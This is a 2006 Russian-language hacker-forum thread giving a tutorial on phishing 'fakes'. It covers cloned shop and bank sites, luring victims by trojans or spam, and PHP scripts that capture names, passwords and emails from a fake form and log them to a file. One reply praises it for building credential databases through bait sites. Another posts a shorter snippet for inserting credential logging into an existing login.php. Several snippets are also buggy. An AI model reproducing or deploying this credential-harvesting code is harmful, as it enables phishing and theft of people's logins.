 |
перехват форм на php or faq по фейкам |
14.06.2006, 02:25
|
|
Новичок
Регистрация: 07.06.2006
Сообщений: 6
С нами:
10488201
Репутация:
1
|
|
перехват форм на php or faq по фейкам
what's it?
Fake(фейк) в переводе с английского-подделка,обман.
Фишинг бывает трех видов
1)Почтовый.
2)Онлайновый.
3)Комбинированный.
Первый из них самый старый,сейчас уже не актуалент почти.Второй - онлайновый подрузумевает под сабой копирование
сайта(например е-шопа),регистрацией похожего доменого имени,в тоже зоне что и офф.шоп.Только разница лишь в том что на нем
предлагаются товары по очень низким ценам(привет эльдорадо -)),ну и как ты понял,товар до покупателя не когда не дойдет
-),а вот ту инфу что он вбил в форме может нести вполне ощутимую информацию.Третий вид наиболее актуален в данное время.Он
подрузумеват под собой полное копирование конторы(например банка ну или сайтов связанных с электронной комерцией),на него
юзер заманивается 2-мя спосабами:
1)троем
2)спамом.
Let's go .
для начали просмотрим небольшую хтмл форму
PHP код:
<form action="evil_script.php" method="post"> <input type="text" name="name"> <input type="text" name="passwod"> <input type="text" name="email"> <input type="submit" value="send">
для тех кто не очень знаком с хтмл я кое что обьясню:
evil_script.php - сообственно говоря наш "зло_скрипт" который будет обрабатывать все данные что ввел юзер и отправляться в
виде пакета методом POST.
Первым делом мы обрабатываем вводимые данные пользователем суперглобаным массивом $HTTP_POST_VARS($_POST сокращенно)
делается это слеудющим образом, в нашем случаем у нас три значения - name,password,email
PHP код:
<? $n = $_POST; $p = $_POST; $e = $_POST; ?>
вроде пока все верено.смотрим след пункт,что у нас нас ? правельность вводоимых данных.Конечно можно заюзать регулярные
выражения,но есть одно НО.Мы веть не знаем какого вида у нас будет точно логин,пароль? единственное можно заюзать регулырне
выражения например для email.
PHP код:
if(!preg_math("/[0-9a-z_]+@[0-9a_z^\.]+\.[a-z]
{2,3}/i",$email)) { echo "неверно введен e-mail.Введите адрес электронной почты в виде mail@server.com"; exit;
Проще там проверить ввел ли данны юзер в поля name,password,email.можно конечно реализовать с помошью функции empty(), но
я передпочел более легкий способо при помощи функции strlen().
PHP код:
if((!strlen($_POST) > 0) || (!strlen($_POST) > 0) || (!strlen($_POST) > 0)) { echo "не все данные введены"; echo "<br>"; echo '<a href="'.$_SERVER.'">вернуться обратно</a>'; }
Теперь данные должны записывать в файл.Причем запись должна осуществляться с конца строки.
Юзать мы будем на выбор или fwrite() или fput() мне больше по душе fwrite(),сам хз почему.
для начала созданим на сервере файл , в нашем случаем 1.txt и не забуть выставит на него права (chmod +x)
далее все реализуется очень просто .
PHP код:
else { @$f = fopen("1.txt","a"); if(!$f) { echo "файл отсутвувет!"; } else { @fwrite($f, "name:$n;password:$p;email:$e \n"); } fclose($f); }
|
|
|
14.06.2006, 03:51
|
|
Members of Antichat
Регистрация: 03.09.2005
Сообщений: 594
С нами:
10886786
Репутация:
685
|
|
Кхм ... читал макаронами подавился. Что за хрень?)) к чему она?
|
|
|
|
14.06.2006, 06:33
|
|
Участник форума
Регистрация: 14.01.2005
Сообщений: 169
С нами:
11221125
Репутация:
23
|
|
Сообщение от NaX[no]r†
Кхм ... читал макаронами подавился. Что за хрень?)) к чему она?
"перехват форм на php or faq по фейкам"
помоему нармальная и нужная faqшка =)
парень расписал как сливать внесенные данныее! тоесть делай сайт с порнушкой рекламь и делай базу кред ! причем всегда валид =)))
|
|
|
|
14.06.2006, 11:17
|
|
OpenVPN.CC
Регистрация: 15.07.2005
Сообщений: 1,599
С нами:
10958786
Репутация:
1034
|
|
Смысл статьй мне всё равно не ясен к чему это ????
Зачем перехватывать формы на своём же сайте ???
илиэто я не вьехал =(
|
|
|
|
14.06.2006, 18:26
|
|
Познавший АНТИЧАТ
Регистрация: 16.04.2006
Сообщений: 1,488
С нами:
10562786
Репутация:
537
|
|
ржунимагу 
не проще
? 
а вообще, если уж решил написать тутор,
писал бы сразу весь код и комментами пояснял что да как. |
|
|
|
14.06.2006, 18:31
|
|
наркоман с медалью
Регистрация: 07.05.2005
Сообщений: 3,704
С нами:
11058146
Репутация:
4536
|
|
{ echo "файл отсутвувет!"; }
ггг, вводит юзверь данные а ему пишет это. мда.
Имхо бред бредом, полозности 0 в квадрате =)
для тех кто не очень знаком с хтмл я кое что обьясню:
ихмо не сделает он достойный фейк, а тот кто сделает - не нуждается в представлении того, что такое форма =)
Последний раз редактировалось Green_Bear; 14.06.2006 в 18:34..
|
|
|
|
15.06.2006, 02:25
|
|
Новичок
Регистрация: 07.06.2006
Сообщений: 6
С нами:
10488201
Репутация:
1
|
|
Nova
>Зачем перехватывать формы на своём же сайте
цель только одна перехватывать данные что ввел юзер(если не понятно для чего нужен фейк почитай на форуме cw)
Дикс
>ржунимагу
если нет разницы зачем писать по другом и "ржать" ?
Green_Bear
>ихмо не сделает он достойный фейк, а тот кто сделает - не нуждается в представлении того, что такое форма =)
ну эт уже просто придирки %) |
|
|
|
15.06.2006, 10:46
|
|
Флудер
Регистрация: 12.08.2004
Сообщений: 3,791
С нами:
11444066
Репутация:
2290
|
|
я уже на xakepy.ru высказался по поводу статьи этой. Бред.
Кстати тут аякс актуаен |
|
|
|
15.06.2006, 11:53
|
|
Постоянный
Регистрация: 11.12.2004
Сообщений: 592
С нами:
11269766
Репутация:
345
|
|
Че еще за злоскрипт? Нах он нужен?
Проще будет в файл по умолчанию, например login.php встатить код
PHP код:
@ini_set('error_reporting',0);
$n=$_POST["name"];
$p=$_POST["password"];
$f = fopen("1.txt","a");
fwrite($f, "name:$n;password:$p\n");
fclose($f);
|
|
|
|
15.06.2006, 14:16
|
|
Флудер
Регистрация: 12.08.2004
Сообщений: 3,791
С нами:
11444066
Репутация:
2290
|
|
для уже ответивших и тех кто будет еще отвечать - не разбираетесь - не лезьте!
|
|
|
|
|
|
Предыдущая тема
Следующая тема
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для NaX[no]rT](/avatars/avatar18908.jpg?163495){kind=avatar}
Похожие темы
Линейный вид
